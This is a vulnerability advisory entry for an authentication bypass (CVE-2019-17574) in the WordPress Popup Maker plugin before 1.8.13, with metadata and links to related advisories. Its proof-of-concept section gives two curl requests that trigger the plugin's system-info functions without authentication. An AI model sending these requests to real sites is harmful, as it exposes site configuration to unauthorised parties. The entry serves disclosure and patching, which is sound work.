Popup-Maker < 1.8.13 – Multiple Vulnerabilities | CVE 2019-17574 | Plugin Vulnerabilities

Description

An attacker can partially control the arguments of the do_action, during the initialization of the PUM_Site . Because of this, an attacker can call any method which contains an action starting from popmake_ or pum_ . This will lead to successful execution of functions which do not require arguments (e.g: PUM_Admin_Tools::sysinfo_download or PUM_Admin_Tools::sysinfo_display) or require one argument as an array.

Proof of Concept

curl http://www.your-domain-with-popup-maker.com/?pum_action=tools_page_tab_system_info


curl -v -d "popmake_action=popup_sysinfo&popmake-sysinfo=choose any content you like" -X POST http://www.your-domain-with-popup-maker.com/

Affects Plugins

Fixed in 1.8.13

References

CVE

URL

https://web.archive.org/web/20191128065954/https://blog.redyops.com/wordpress-plugin-popup-maker/

Classification

Type

AUTHBYPASS

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Dimopoulos Ilias

Submitter

Dimopoulos Ilias

Submitter website

https://redyops.com/

Verified

No

WPVDB ID

f9eb8bf2-85cd-413d-8234-fcd3c0456894

Timeline

Publicly Published

2019-10-14 (about 6 years ago)

Added

2019-10-14 (about 6 years ago)

Last Updated

2021-01-19 (about 5 years ago)

Other

Published

Title

Published

2024-10-25

Title

Wux Blog Editor <= 3.0.0 - Authentication Bypass to Administrator

Published

2021-07-19

Title

Profile Builder < 3.4.9 - Admin Access via Password Reset

Published

2014-11-24

Title

Download Manager <= 2.7.2 - Privilege Escalation

Published

2024-12-03

Title

WooCommerce < 9.4.3 - Unauthenticated Order Creation

Published

2025-07-03

Title

WP Compress < 6.30.31 - Unauthenticated Broken Authentication